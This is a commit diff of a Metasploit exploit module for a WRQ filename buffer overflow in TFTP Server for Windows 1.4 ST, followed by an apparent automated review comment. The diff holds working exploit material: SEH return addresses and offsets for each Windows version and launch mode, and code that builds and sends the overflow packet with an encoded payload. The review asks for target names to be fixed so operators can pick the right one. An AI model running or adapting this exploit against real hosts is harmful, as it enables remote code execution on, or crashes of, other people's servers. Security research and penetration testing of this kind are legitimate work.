Implemented Changes suggested by wchen-r7 (sinn3r)

unknown 2012-04-20 00:02:41 +01:00 committed by sinn3r
parent feb625cab0
commit 47ecd36805
1 changed files with 18 additions and 7 deletions


@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
'Description' => %q{ TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni
muts..at..offensive-security.com SEH Exploit
muts..at..offensive-security.com
The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request.
The server will append the user-supplied filename to TFTP server binary's path without any bounds checking,
and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null,
which allows the corrupted data to be used in a strcmp() function, causing an access violation.
Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine
launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly.
A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service.
ported to metasploit by Datacut},
'Author' =>
@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista
[ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe
[ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe
[ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe
],
'Privileged' => false,
'DisclosureDate'=> 'Mar 26 2008',
'DefaultTarget' => 2))
'DefaultTarget' => 5))
register_options(
@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
mode = "netascii"
sploit = "\x00\x02" + evil + "\0" + mode +"\0"
sploit = "\x00\x02" + evil + "\0" + mode +"\0" #Send the WRQ packet (header "\x00\x02")
udp_sock.put(sploit)
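Review bot: The new target list in the second hunk has a typo in a user-visible target name and a naming mismatch with the description: the last entry reads `'Windows 7 SP0/SP1 EN x86 Standalone Mose'` and should be `'Windows 7 SP0/SP1 EN x86 Standalone Mode'`, and the description tells the operator to choose between 'Service' and 'Standalone' while the targets are labelled 'Server Mode', so one of the two terms should be used consistently (e.g. rename the three `... Server Mode` entries to `... Service Mode`). Since the description itself says a wrong target choice likely crashes the service, target names are the only cue the operator has, so they should match the wording they are told to look for. The `DefaultTarget => 5` line now silently selects the x86 Standalone entry; a short comment next to it such as `# index 5 = Windows 7 x86 Standalone; pick Server-mode targets explicitly if TFTP runs as a service` would make that choice visible. The enclosing `update_info` call that this array belongs to starts before the hunk.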